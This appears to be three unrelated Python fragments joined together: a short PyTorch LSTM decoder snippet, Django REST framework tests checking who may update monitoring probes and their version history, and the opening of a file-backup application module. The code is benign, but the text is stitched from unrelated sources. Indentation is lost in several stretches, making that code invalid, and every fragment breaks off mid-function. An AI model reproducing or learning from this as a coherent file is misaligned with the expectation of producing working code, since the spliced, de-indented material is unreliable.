pos_enc = torch.zeros( self.out_length, enc.shape[1], self.posi_enc_dim+self.posi_enc_ego_dim, device=enc.device )
enc2 = torch.cat( (enc, pos_enc), dim=2)
fut_preds = []
for k in range(self.modes):
h_dec, _ = self.dec_lstm[k](enc2)
h_dec | |
content, content_type=content_type)
request.tenant = self.super_tenant
force_authenticate(request, user=self.superuser)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.data['detail'], 'Package version should be specified.'
)
self.assertEqual(admin_models.Probe.objects.all().count(), 3)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
name=probe.name, package=probe.package
)
self.assertEqual(
admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
self.assertEqual(version.version_user, 'poem')
    def test_put_probe_with_no_package_version_sp_user(self):
        """PUT with a nonexistent package as a SuperPOEM regular user is
        rejected with 401 and leaves the probe and its history untouched."""
        self.assertEqual(admin_models.Probe.objects.all().count(), 3)
        data = {
            'id': self.probe1.id,
            'name': 'argo-web-api',
            'package': 'nonexisting',
            'comment': 'New version.',
            'docurl':
                'https://github.com/ARGOeu/nagios-plugins-argo/blob/'
                'master/README.md',
            'description': 'Probe is inspecting AMS service by trying '
                           'to publish and consume randomly generated '
                           'messages.',
            'repository': 'https://github.com/ARGOeu/nagios-plugins-'
                          'argo',
            'update_metrics': False
        }
        content, content_type = encode_data(data)
        request = self.factory.put(self.url, content, content_type=content_type)
        request.tenant = self.super_tenant
        force_authenticate(request, user=self.user)
        response = self.view(request)
        # Non-superusers may not modify probes at all.
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            response.data['detail'],
            'You do not have permission to change probes.'
        )
        # The stored probe and its latest history entry must be unchanged.
        self.assertEqual(admin_models.Probe.objects.all().count(), 3)
        probe = admin_models.Probe.objects.get(id=self.probe1.id)
        version = admin_models.ProbeHistory.objects.get(
            name=probe.name, package=probe.package
        )
        self.assertEqual(
            admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
        )
        self.assertEqual(probe.name, 'ams-probe')
        self.assertEqual(probe.package, self.package2)
        self.assertEqual(
            probe.description,
            'Probe is inspecting AMS service by trying to publish and consume '
            'randomly generated messages.'
        )
        self.assertEqual(probe.comment, 'Newer version.')
        self.assertEqual(
            probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
        )
        self.assertEqual(
            probe.docurl,
            'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
            'README.md'
        )
        # History record must still mirror the probe field-for-field.
        self.assertEqual(version.name, probe.name)
        self.assertEqual(version.package, probe.package)
        self.assertEqual(version.description, probe.description)
        self.assertEqual(version.comment, probe.comment)
        self.assertEqual(version.repository, probe.repository)
        self.assertEqual(version.docurl, probe.docurl)
        self.assertEqual(
            version.version_comment,
            '[{"changed": {"fields": ["package", "comment"]}}]'
        )
        self.assertEqual(version.version_user, 'poem')
    def test_put_probe_with_no_package_version_tenant_superuser(self):
        """PUT with a nonexistent package as a tenant superuser is rejected
        with 401 and leaves the probe and its history untouched."""
        self.assertEqual(admin_models.Probe.objects.all().count(), 3)
        data = {
            'id': self.probe1.id,
            'name': 'argo-web-api',
            'package': 'nonexisting',
            'comment': 'New version.',
            'docurl':
                'https://github.com/ARGOeu/nagios-plugins-argo/blob/'
                'master/README.md',
            'description': 'Probe is inspecting AMS service by trying '
                           'to publish and consume randomly generated '
                           'messages.',
            'repository': 'https://github.com/ARGOeu/nagios-plugins-'
                          'argo',
            'update_metrics': False
        }
        content, content_type = encode_data(data)
        request = self.factory.put(self.url, content, content_type=content_type)
        request.tenant = self.tenant
        force_authenticate(request, user=self.tenant_superuser)
        response = self.view(request)
        # Even a tenant superuser may not modify probes.
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            response.data['detail'],
            'You do not have permission to change probes.'
        )
        # The stored probe and its latest history entry must be unchanged.
        self.assertEqual(admin_models.Probe.objects.all().count(), 3)
        probe = admin_models.Probe.objects.get(id=self.probe1.id)
        version = admin_models.ProbeHistory.objects.get(
            name=probe.name, package=probe.package
        )
        self.assertEqual(
            admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
        )
        self.assertEqual(probe.name, 'ams-probe')
        self.assertEqual(probe.package, self.package2)
        self.assertEqual(
            probe.description,
            'Probe is inspecting AMS service by trying to publish and consume '
            'randomly generated messages.'
        )
        self.assertEqual(probe.comment, 'Newer version.')
        self.assertEqual(
            probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
        )
        self.assertEqual(
            probe.docurl,
            'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
            'README.md'
        )
        # History record must still mirror the probe field-for-field.
        self.assertEqual(version.name, probe.name)
        self.assertEqual(version.package, probe.package)
        self.assertEqual(version.description, probe.description)
        self.assertEqual(version.comment, probe.comment)
        self.assertEqual(version.repository, probe.repository)
        self.assertEqual(version.docurl, probe.docurl)
        self.assertEqual(
            version.version_comment,
            '[{"changed": {"fields": ["package", "comment"]}}]'
        )
        self.assertEqual(version.version_user, 'poem')
    def test_put_probe_with_no_package_version_tenant_user(self):
        """PUT with a nonexistent package as a tenant regular user is rejected
        with 401 and leaves the probe and its history untouched."""
        self.assertEqual(admin_models.Probe.objects.all().count(), 3)
        data = {
            'id': self.probe1.id,
            'name': 'argo-web-api',
            'package': 'nonexisting',
            'comment': 'New version.',
            'docurl':
                'https://github.com/ARGOeu/nagios-plugins-argo/blob/'
                'master/README.md',
            'description': 'Probe is inspecting AMS service by trying '
                           'to publish and consume randomly generated '
                           'messages.',
            'repository': 'https://github.com/ARGOeu/nagios-plugins-'
                          'argo',
            'update_metrics': False
        }
        content, content_type = encode_data(data)
        request = self.factory.put(self.url, content, content_type=content_type)
        request.tenant = self.tenant
        force_authenticate(request, user=self.tenant_user)
        response = self.view(request)
        # Tenant users may not modify probes.
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            response.data['detail'],
            'You do not have permission to change probes.'
        )
        # The stored probe and its latest history entry must be unchanged.
        self.assertEqual(admin_models.Probe.objects.all().count(), 3)
        probe = admin_models.Probe.objects.get(id=self.probe1.id)
        version = admin_models.ProbeHistory.objects.get(
            name=probe.name, package=probe.package
        )
        self.assertEqual(
            admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
        )
        self.assertEqual(probe.name, 'ams-probe')
        self.assertEqual(probe.package, self.package2)
        self.assertEqual(
            probe.description,
            'Probe is inspecting AMS service by trying to publish and consume '
            'randomly generated messages.'
        )
        self.assertEqual(probe.comment, 'Newer version.')
        self.assertEqual(
            probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
        )
        self.assertEqual(
            probe.docurl,
            'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
            'README.md'
        )
        # History record must still mirror the probe field-for-field.
        self.assertEqual(version.name, probe.name)
        self.assertEqual(version.package, probe.package)
        self.assertEqual(version.description, probe.description)
        self.assertEqual(version.comment, probe.comment)
        self.assertEqual(version.repository, probe.repository)
        self.assertEqual(version.docurl, probe.docurl)
        self.assertEqual(
            version.version_comment,
            '[{"changed": {"fields": ["package", "comment"]}}]'
        )
        self.assertEqual(version.version_user, 'poem')
    def test_put_probe_without_new_version_sp_superuser(self):
        """PUT that keeps the same package version, as a SuperPOEM superuser:
        succeeds with 201 and updates the latest history entry in place (the
        history count stays at 2 -- no new version is created), propagating
        the probekey to the metric template, the tenant metric and the
        serialized tenant history."""
        data = {
            'id': self.probe1.id,
            'name': 'ams-probe-new',
            'package': 'nagios-plugins-argo (0.1.11)',
            'comment': 'Newer version.',
            'docurl':
                'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
                'master/README.md',
            'description': 'Probe is inspecting AMS service.',
            'repository': 'https://github.com/ARGOeu/nagios-plugins-'
                          'argo2',
            'update_metrics': False
        }
        content, content_type = encode_data(data)
        request = self.factory.put(self.url, content, content_type=content_type)
        request.tenant = self.super_tenant
        force_authenticate(request, user=self.superuser)
        response = self.view(request)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        probe = admin_models.Probe.objects.get(id=self.probe1.id)
        version = admin_models.ProbeHistory.objects.get(
            object_id=probe, package__version=probe.package.version
        )
        # Same package version: the history entry is edited, not duplicated.
        self.assertEqual(
            admin_models.ProbeHistory.objects.filter(object_id=probe).count(), 2
        )
        self.assertEqual(probe.name, 'ams-probe-new')
        self.assertEqual(probe.package, self.package2)
        self.assertEqual(probe.comment, 'Newer version.')
        self.assertEqual(
            probe.docurl,
            'https://github.com/ARGOeu/nagios-plugins-argo2/blob/master/'
            'README.md',
        )
        self.assertEqual(
            probe.description, 'Probe is inspecting AMS service.'
        )
        self.assertEqual(
            probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo2'
        )
        # History record mirrors the updated probe field-for-field.
        self.assertEqual(version.name, probe.name)
        self.assertEqual(version.package, probe.package)
        self.assertEqual(version.comment, probe.comment)
        self.assertEqual(version.docurl, probe.docurl)
        self.assertEqual(version.description, probe.description)
        self.assertEqual(version.repository, probe.repository)
        self.assertEqual(
            version.version_comment,
            '[{"changed": {"fields": ["comment", "description", "docurl", '
            '"name", "package", "repository"]}}]'
        )
        # The updated probekey must propagate to the metric template and the
        # tenant metric; the metric's other fields stay as they were.
        mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
        self.assertEqual(mt.probekey, version)
        metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
        self.assertEqual(metric.group.name, 'TEST')
        self.assertEqual(metric.parent, '')
        self.assertEqual(metric.probeexecutable, '["ams-probe"]')
        self.assertEqual(metric.probekey, version)
        self.assertEqual(
            metric.config,
            '["maxCheckAttempts 3", "timeout 60", '
            '"path /usr/libexec/argo-monitoring/probes/argo", '
            '"interval 5", "retryInterval 3"]'
        )
        self.assertEqual(metric.attribute, '["argo.ams_TOKEN --token"]')
        self.assertEqual(metric.dependancy, '')
        self.assertEqual(metric.flags, '["OBSESS 1"]')
        self.assertEqual(metric.files, '')
        self.assertEqual(metric.parameter, '["--project EGI"]')
        self.assertEqual(metric.fileparameter, '')
        # Tenant history still holds a single (initial) entry whose
        # serialized form matches the updated metric and renamed probe.
        mt_history = poem_models.TenantHistory.objects.filter(
            object_repr='argo.AMS-Check'
        ).order_by('-date_created')
        self.assertEqual(mt_history.count(), 1)
        self.assertEqual(
            mt_history[0].comment, 'Initial version.'
        )
        serialized_data = json.loads(mt_history[0].serialized_data)[0]['fields']
        self.assertEqual(serialized_data['name'], metric.name)
        self.assertEqual(serialized_data['mtype'], ['Active'])
        self.assertEqual(
            serialized_data['probekey'], ['ams-probe-new', '0.1.11']
        )
        self.assertEqual(serialized_data['group'], ['TEST'])
        self.assertEqual(serialized_data['parent'], metric.parent)
        self.assertEqual(
            serialized_data['probeexecutable'], metric.probeexecutable
        )
        self.assertEqual(serialized_data['config'], metric.config)
        self.assertEqual(serialized_data['attribute'], metric.attribute)
        self.assertEqual(serialized_data['dependancy'], metric.dependancy)
        self.assertEqual(serialized_data['flags'], metric.flags)
        self.assertEqual(serialized_data['files'], metric.files)
        self.assertEqual(serialized_data['parameter'], metric.parameter)
        self.assertEqual(serialized_data['fileparameter'], metric.fileparameter)
    def test_put_probe_without_new_version_sp_user(self):
        """PUT that keeps the same package version, as a SuperPOEM regular
        user: rejected with 401; probe, history, metric template, tenant
        metric and serialized tenant history all stay unchanged."""
        data = {
            'id': self.probe1.id,
            'name': 'ams-probe-new',
            'package': 'nagios-plugins-argo (0.1.11)',
            'comment': 'Newer version.',
            'docurl':
                'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
                'master/README.md',
            'description': 'Probe is inspecting AMS service.',
            'repository': 'https://github.com/ARGOeu/nagios-plugins-'
                          'argo2',
            'update_metrics': False
        }
        content, content_type = encode_data(data)
        request = self.factory.put(self.url, content, content_type=content_type)
        request.tenant = self.super_tenant
        force_authenticate(request, user=self.user)
        response = self.view(request)
        # Non-superusers may not modify probes at all.
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            response.data['detail'],
            'You do not have permission to change probes.'
        )
        # The stored probe keeps its original name and fields.
        probe = admin_models.Probe.objects.get(id=self.probe1.id)
        version = admin_models.ProbeHistory.objects.get(
            object_id=probe, package=probe.package
        )
        self.assertEqual(probe.name, 'ams-probe')
        self.assertEqual(probe.package, self.package2)
        self.assertEqual(probe.comment, 'Newer version.')
        self.assertEqual(
            probe.docurl,
            'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
            'README.md',
        )
        self.assertEqual(
            probe.description,
            'Probe is inspecting AMS service by trying to publish and consume '
            'randomly generated messages.'
        )
        self.assertEqual(
            probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
        )
        # History record still mirrors the untouched probe.
        self.assertEqual(version.name, probe.name)
        self.assertEqual(version.package, probe.package)
        self.assertEqual(version.comment, probe.comment)
        self.assertEqual(version.docurl, probe.docurl)
        self.assertEqual(version.description, probe.description)
        self.assertEqual(version.repository, probe.repository)
        self.assertEqual(
            version.version_comment,
            '[{"changed": {"fields": ["package", "comment"]}}]'
        )
        # Metric template and tenant metric keep the original probekey.
        mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
        self.assertEqual(mt.probekey, version)
        metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
        self.assertEqual(metric.group.name, 'TEST')
        self.assertEqual(metric.parent, '')
        self.assertEqual(metric.probeexecutable, '["ams-probe"]')
        self.assertEqual(metric.probekey, version)
        self.assertEqual(
            metric.config,
            '["maxCheckAttempts 3", "timeout 60", '
            '"path /usr/libexec/argo-monitoring/probes/argo", '
            '"interval 5", "retryInterval 3"]'
        )
        self.assertEqual(metric.attribute, '["argo.ams_TOKEN --token"]')
        self.assertEqual(metric.dependancy, '')
        self.assertEqual(metric.flags, '["OBSESS 1"]')
        self.assertEqual(metric.files, '')
        self.assertEqual(metric.parameter, '["--project EGI"]')
        self.assertEqual(metric.fileparameter, '')
        # Serialized tenant history still references the original probe name.
        mt_history = poem_models.TenantHistory.objects.filter(
            object_repr='argo.AMS-Check'
        ).order_by('-date_created')
        self.assertEqual(mt_history.count(), 1)
        self.assertEqual(
            mt_history[0].comment, 'Initial version.'
        )
        serialized_data = json.loads(mt_history[0].serialized_data)[0]['fields']
        self.assertEqual(serialized_data['name'], metric.name)
        self.assertEqual(serialized_data['mtype'], ['Active'])
        self.assertEqual(
            serialized_data['probekey'], ['ams-probe', '0.1.11']
        )
        self.assertEqual(serialized_data['group'], ['TEST'])
        self.assertEqual(serialized_data['parent'], metric.parent)
        self.assertEqual(
            serialized_data['probeexecutable'], metric.probeexecutable
        )
        self.assertEqual(serialized_data['config'], metric.config)
        self.assertEqual(serialized_data['attribute'], metric.attribute)
        self.assertEqual(serialized_data['dependancy'], metric.dependancy)
        self.assertEqual(serialized_data['flags'], metric.flags)
        self.assertEqual(serialized_data['files'], metric.files)
        self.assertEqual(serialized_data['parameter'], metric.parameter)
        self.assertEqual(serialized_data['fileparameter'], metric.fileparameter)
    def test_put_probe_without_new_version_tenant_superuser(self):
        """PUT that keeps the same package version, as a tenant superuser:
        rejected with 401; probe, history, metric template, tenant metric
        and serialized tenant history all stay unchanged."""
        data = {
            'id': self.probe1.id,
            'name': 'ams-probe-new',
            'package': 'nagios-plugins-argo (0.1.11)',
            'comment': 'Newer version.',
            'docurl':
                'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
                'master/README.md',
            'description': 'Probe is inspecting AMS service.',
            'repository': 'https://github.com/ARGOeu/nagios-plugins-'
                          'argo2',
            'update_metrics': False
        }
        content, content_type = encode_data(data)
        request = self.factory.put(self.url, content, content_type=content_type)
        request.tenant = self.tenant
        force_authenticate(request, user=self.tenant_superuser)
        response = self.view(request)
        # Even a tenant superuser may not modify probes.
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            response.data['detail'],
            'You do not have permission to change probes.'
        )
        # The stored probe keeps its original name and fields.
        probe = admin_models.Probe.objects.get(id=self.probe1.id)
        version = admin_models.ProbeHistory.objects.get(
            object_id=probe, package=probe.package
        )
        self.assertEqual(probe.name, 'ams-probe')
        self.assertEqual(probe.package, self.package2)
        self.assertEqual(probe.comment, 'Newer version.')
        self.assertEqual(
            probe.docurl,
            'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
            'README.md',
        )
        self.assertEqual(
            probe.description,
            'Probe is inspecting AMS service by trying to publish and consume '
            'randomly generated messages.'
        )
        self.assertEqual(
            probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
        )
        # History record still mirrors the untouched probe.
        self.assertEqual(version.name, probe.name)
        self.assertEqual(version.package, probe.package)
        self.assertEqual(version.comment, probe.comment)
        self.assertEqual(version.docurl, probe.docurl)
        self.assertEqual(version.description, probe.description)
        self.assertEqual(version.repository, probe.repository)
        self.assertEqual(
            version.version_comment,
            '[{"changed": {"fields": ["package", "comment"]}}]'
        )
        # Metric template and tenant metric keep the original probekey.
        mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
        self.assertEqual(mt.probekey, version)
        metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
        self.assertEqual(metric.group.name, 'TEST')
        self.assertEqual(metric.parent, '')
        self.assertEqual(metric.probeexecutable, '["ams-probe"]')
        self.assertEqual(metric.probekey, version)
        self.assertEqual(
            metric.config,
            '["maxCheckAttempts 3", "timeout 60", '
            '"path /usr/libexec/argo-monitoring/probes/argo", '
            '"interval 5", "retryInterval 3"]'
        )
        self.assertEqual(metric.attribute, '["argo.ams_TOKEN --token"]')
        self.assertEqual(metric.dependancy, '')
        self.assertEqual(metric.flags, '["OBSESS 1"]')
        self.assertEqual(metric.files, '')
        self.assertEqual(metric.parameter, '["--project EGI"]')
        self.assertEqual(metric.fileparameter, '')
        # Serialized tenant history still references the original probe name.
        mt_history = poem_models.TenantHistory.objects.filter(
            object_repr='argo.AMS-Check'
        ).order_by('-date_created')
        self.assertEqual(mt_history.count(), 1)
        self.assertEqual(
            mt_history[0].comment, 'Initial version.'
        )
        serialized_data = json.loads(mt_history[0].serialized_data)[0]['fields']
        self.assertEqual(serialized_data['name'], metric.name)
        self.assertEqual(serialized_data['mtype'], ['Active'])
        self.assertEqual(
            serialized_data['probekey'], ['ams-probe', '0.1.11']
        )
        self.assertEqual(serialized_data['group'], ['TEST'])
        self.assertEqual(serialized_data['parent'], metric.parent)
        self.assertEqual(
            serialized_data['probeexecutable'], metric.probeexecutable
        )
        self.assertEqual(serialized_data['config'], metric.config)
        self.assertEqual(serialized_data['attribute'], metric.attribute)
        self.assertEqual(serialized_data['dependancy'], metric.dependancy)
        self.assertEqual(serialized_data['flags'], metric.flags)
        self.assertEqual(serialized_data['files'], metric.files)
        self.assertEqual(serialized_data['parameter'], metric.parameter)
        self.assertEqual(serialized_data['fileparameter'], metric.fileparameter)
def test_put_probe_without_new_version_tenant_user(self):
data = {
'id': self.probe1.id,
'name': 'ams-probe-new',
'package': 'nagios-plugins-argo (0.1.11)',
'comment': 'Newer version.',
'docurl':
'https://github.com/ARGOeu/nagios-plugins-argo2/blob/'
'master/README.md',
'description': 'Probe is inspecting AMS service.',
'repository': 'https://github.com/ARGOeu/nagios-plugins-'
'argo2',
'update_metrics': False
}
content, content_type = encode_data(data)
request = self.factory.put(self.url, content, content_type=content_type)
request.tenant = self.tenant
force_authenticate(request, user=self.tenant_user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
response.data['detail'],
'You do not have permission to change probes.'
)
probe = admin_models.Probe.objects.get(id=self.probe1.id)
version = admin_models.ProbeHistory.objects.get(
object_id=probe, package=probe.package
)
self.assertEqual(probe.name, 'ams-probe')
self.assertEqual(probe.package, self.package2)
self.assertEqual(probe.comment, 'Newer version.')
self.assertEqual(
probe.docurl,
'https://github.com/ARGOeu/nagios-plugins-argo/blob/master/'
'README.md',
)
self.assertEqual(
probe.description,
'Probe is inspecting AMS service by trying to publish and consume '
'randomly generated messages.'
)
self.assertEqual(
probe.repository, 'https://github.com/ARGOeu/nagios-plugins-argo'
)
self.assertEqual(version.name, probe.name)
self.assertEqual(version.package, probe.package)
self.assertEqual(version.comment, probe.comment)
self.assertEqual(version.docurl, probe.docurl)
self.assertEqual(version.description, probe.description)
self.assertEqual(version.repository, probe.repository)
self.assertEqual(
version.version_comment,
'[{"changed": {"fields": ["package", "comment"]}}]'
)
mt = admin_models.MetricTemplate.objects.get(name='argo.AMS-Check')
self.assertEqual(mt.probekey, version)
metric = poem_models.Metric.objects.get(name='argo.AMS-Check')
self.assertEqual(metric.group.name, 'TEST')
self.assertEqual(metric.parent, '')
| |
"""
:license:
license is described in the LICENSE file provided.
A copy can be accessed in: https://github.com/dev-567/PyBackuper/blob/main/LICENSE
:author:
<NAME>
:packages:
packages used in the project:
- oscrypto
- google-api-python-client google-auth-httplib2 google-auth-oauthlib
You can install these packages using the install.py provided.
"""
import sys
import datetime
import importlib.util as import_util
import logging
import pathlib
import atexit
from . import localstorage
from . import crypto
from . import streamtologger
class App:
APP_NAME = "Backuper"
APP_VERSION = "0.7"
# This value will leave 2048 bytes of extra space, allowing encrypted data (which sometimes
# increase in size) not overflow our max value of 16MB, also included in this 2048, the 3
# bytes we use for the block length info.
# Reason for this max value of 16MB is the use of only 3 bytes to indicate each block length
# in the stream.
BLOCK_SIZE = (2 ** (3 * 8) - 1) - 2048
HASH_DIGEST_LENGTH = 64 # max value for blake2b: 64
HASH_PARTIAL_BLOCK = 123 # used on localstorage.LocalStorage.get_signature()
PACKED_FILE_EXTENSION = ".packed" # used to identify files after localstorage.LocalStorage.pack (compressed and encrypted)
PLAINBYTES_EXTENSION = ".bytes" # used to save files with plain bytes, used for salt and app_key, as they shouldnt be encrypted.
MANIFEST_FILENAME = "manifest" + PACKED_FILE_EXTENSION
APP_KEY_FILENAME = "app_key" + PLAINBYTES_EXTENSION
SALTED_FILENAME = "salted" + PACKED_FILE_EXTENSION
SALT_FILENAME = "salt" + PLAINBYTES_EXTENSION
TOKEN_FILENAME = "token" + PACKED_FILE_EXTENSION
def __init__(self, config_file_path, press_enter_to_finish=False):
"""
:param config_file_path str | pathlib.Path: path pointing to the config file.
:param press_enter_to_finish bool: if True, will wait for press enter input when the script is done.
"""
self.config_file_path = config_file_path
self.press_enter_to_finish = press_enter_to_finish
# config instance: remember if you change this you have to update the
# local_storage and remote_storage versions of the config.
self.config = None # Config instance from config file
self.logger = None # logger used to communicate messages to user/dev
self.local_storage = None
self.remote_storage = None
self.salted_key = None # user key to [de]encrypt user files
self.app_key = None # app key used to [de]encrypt local app files (salted and token, these files are disposables)
assert (
self.BLOCK_SIZE < (2 ** (3 * 8)) - 1
), "BLOCK_SIZE should be lower than 16MB-1 (because of the three length bytes)"
assert (
self.HASH_PARTIAL_BLOCK <= self.BLOCK_SIZE
), "HASH_PARTIAL_BLOCK should be equal or lower than the BLOCK_SIZE"
assert (
self.HASH_DIGEST_LENGTH <= 64
), "HASH_DIGEST_LENGTH should be at max 64, this is the max allowed value for blake2b digest"
atexit.register(self._on_exit)
def _check_config(self, config_instance):
"""
Check if the config structure have the minimum attributes required to proceed.
:param config_instance config_example.Config: any class with those minimum attributes.
"""
keys = (
"local_folder_path",
"remote_folder_path",
"local_manifest_folder_path",
"temp_folder_path",
"log_file_path",
"print_debug_flag",
"fulldebug_flag",
"format_debug_flag",
"save_debug_to_file_flag",
"gdrive_secret_file_path",
"gdrive_save_token_flag",
"gdrive_token_folder_path",
"compression_ratio",
"encryption_save_salted_password_flag",
"encryption_salted_folder_path",
"app_key_folder_path",
)
for key in keys:
if key not in config_instance.__dict__:
raise AttributeError("Attribute {} missing on class.".format(key))
if key.endswith("_path"):
if not isinstance(config_instance.__dict__[key], pathlib.Path):
config_instance.__dict__[key] = pathlib.Path(
config_instance.__dict__[key]
)
# ignore those
if key in ("remote_folder_path"):
continue
# check those if parent folder exists
elif key in ("log_file_path"):
if not config_instance.__dict__[key].parent.exists():
raise AttributeError(
"Folder from path at config_instance.{} doesnt exist.".format(
key
)
)
# everything else check if file exists
elif not config_instance.__dict__[key].exists():
raise AttributeError(
"Path at config_instance.{} doesnt exist.".format(key)
)
elif key.endswith("_flag"):
if type(config_instance.__dict__[key]) is not bool:
raise AttributeError(
"config_instance.{} should be a 'boolean' value.".format(key)
)
elif key == "compression_ratio":
if type(config_instance.__dict__[key]) is not float:
raise AttributeError(
"config_instance.{} should be a 'float' value.".format(key)
)
if not (0.0 <= config_instance.__dict__[key] <= 1.0):
raise AttributeError(
"config_instance.{} should be at the interval 0.0...1.0 (inclusive both).".format(
key
)
)
if not hasattr(config_instance, "filter_function"):
raise AttributeError("Config class should define a filter_function")
def _load_config(self):
"""
Load the self.config_file_path file as a python file where its expected to have a
single class called Config. In this class with expect some attributes as configuration
values for our program. These values are checked on self._check_config. At the end
we have a self.config set and its accessed globally by the application.
"""
# load config module
spec = import_util.spec_from_file_location("config", self.config_file_path)
config_module = import_util.module_from_spec(spec)
spec.loader.exec_module(config_module)
# read config data
self.config = config_module.Config(
module_folder_path=pathlib.Path(__file__).parent,
app_folder_path=pathlib.Path(sys.argv[0]).parent,
config_folder_path=self.config_file_path.parent,
system_tempfolder_path=localstorage.LocalStorage.get_default_tempfolder_path(),
)
self._check_config(self.config)
self.salted_key = None # user key to encrypt user files
self.app_key = None # app key to encrypt app files
    def _setup_logger(self):
        """
        Setup the self.logger instance used by other classes like: LocalStorage or RemoteStorage.

        Two handlers are attached: a FileHandler on config.log_file_path (level
        controlled by save_debug_to_file_flag) and a StreamHandler for the
        console. When print_debug_flag is set, sys.stderr is also redirected
        into the logger via streamtologger.StreamToLogger.
        """
        # Pick the console/file verbosity from the debug flags.
        if self.config.print_debug_flag:
            if self.config.fulldebug_flag:
                # custom level one notch below DEBUG
                logging.addLevelName(9, "FULLDEBUG")
                debug_level = logging.DEBUG - 1  # fulldebug
            else:
                debug_level = logging.DEBUG  # debug
        else:
            debug_level = logging.INFO  # debug disabled
        self.logger = logging.getLogger(self.APP_NAME + " " + self.APP_VERSION)
        self.logger.setLevel(
            logging.NOTSET + 1
        )  # all inclusive, cant be zero = inactive (handlers filter instead)
        if self.config.format_debug_flag:
            formatter = logging.Formatter(
                "(%(processName)s | %(threadName)s | %(asctime)s | %(levelname)s)\n%(message)s"
            )
        else:
            formatter = logging.Formatter("%(message)s")
        # Rotate the log once it grows past 100 KiB: keep a single "_old" copy.
        if self.config.log_file_path.exists():
            if self.config.log_file_path.stat().st_size > 100 * 1024:
                log_path_old = self.config.log_file_path.parent / (
                    self.config.log_file_path.stem
                    + "_old"
                    + self.config.log_file_path.suffix
                )
                if log_path_old.exists():
                    log_path_old.unlink()
                self.config.log_file_path.rename(log_path_old)
        handler = logging.FileHandler(self.config.log_file_path)
        handler.setFormatter(formatter)
        # file logging config
        # if the flag is off, only save log INFO or above.
        handler.setLevel(
            debug_level if self.config.save_debug_to_file_flag else logging.INFO
        )
        self.logger.addHandler(handler)
        handler = logging.StreamHandler()
        handler.setFormatter(formatter)
        # stream/prompt config
        handler.setLevel(debug_level)  # console logging level
        self.logger.addHandler(handler)
        if self.config.print_debug_flag:
            # only redirect python errors if in debug mode
            stderr = streamtologger.StreamToLogger(self.logger, logging.DEBUG)
            # do a small test as DEBUG level before switching it to ERROR
            stderr.write("Stderr redirect is working.")
            stderr.flush()
            stderr.level = logging.ERROR  # change to ERROR level
            sys.stderr = stderr  # redirect sys.stderr into StreamToLogger instance
        self.logger.info("Logger created.")
def _load_app_key(self):
"""
Load the self.app_key from file (if not found, its randomly generated).
Its supposed to be a key package wide, used by any projects or instances.
This key is used to encrypt local disposable files which is better than leaving
them as plain text.
"""
self.logger.debug("Loading app key...")
key_path = self.config.app_key_folder_path / self.APP_KEY_FILENAME
if not key_path.exists():
self.logger.debug("App key not found, generating...")
self.app_key = crypto.generate_app_key()
self.logger.debug("App key generated, saving...")
with key_path.open("wb") as file:
file.write(self.app_key)
self.logger.debug("App key saved.")
else:
with key_path.open("rb") as file:
self.app_key = file.read()
self.logger.debug("App key loaded.")
def _load_salted_key(self):
"""
Try to load the salted version of password from file, if its not available ask the user,
acquire the salt and apply the salt. Both ways the password is saved on self.salted_key.
:return None:
"""
if self.config.encryption_save_salted_password_flag:
self.logger.debug("Loading salted...")
salted_path = (
self.config.encryption_salted_folder_path / self.SALTED_FILENAME
)
if salted_path.exists():
if not self.remote_storage.has_salt():
self.logger.warn(
"Remote salt doesnt exist, but local salted hash is present.\nIf you lose the salted hash you wont be able to regenerate the same hash without the salt."
)
temp_file_path = self.local_storage.get_new_tempfile()
try:
self.local_storage.unpack(salted_path, temp_file_path, self.app_key)
with temp_file_path.open("rb") as file:
self.salted_key = file.read()
except AttributeError:
self.salted_key = None
self.logger.debug(
"Could not load salted file, type your password again."
)
